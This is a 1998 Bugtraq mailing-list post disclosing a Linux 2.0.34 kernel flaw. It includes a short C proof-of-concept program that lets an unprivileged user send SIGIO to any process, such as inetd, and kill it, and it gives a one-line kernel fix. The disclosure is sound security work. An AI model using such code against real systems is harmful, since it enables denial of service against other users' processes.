Date: Tue, 30 Jun 1998 15:10:47 +0800
From: David Luyer <luyer@UCS.UWA.EDU.AU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Serious Linux 2.0.34 security problem
I just saw this mentioned on linux-kernel and confirmed it;
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
int s, p;
if(argc != 2) {
fputs("Please specify a pid to send signal to.\n", stderr);
exit(0);
} else {
p = atoi(argv[1]);
}
fcntl(0,F_SETOWN,p);
s = fcntl(0,F_GETFL,0);
fcntl(0,F_SETFL,s|O_ASYNC);
printf("Sending SIGIO - press enter.\n");
getchar();
fcntl(0,F_SETFL,s&~O_ASYNC);
printf("SIGIO send attempted.\n");
return 0;
}
This can kill from a normal user account the inetd process under Linux
2.0.34 by sending a SIGIO. Very bad.
The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
is approximately 139.
David.
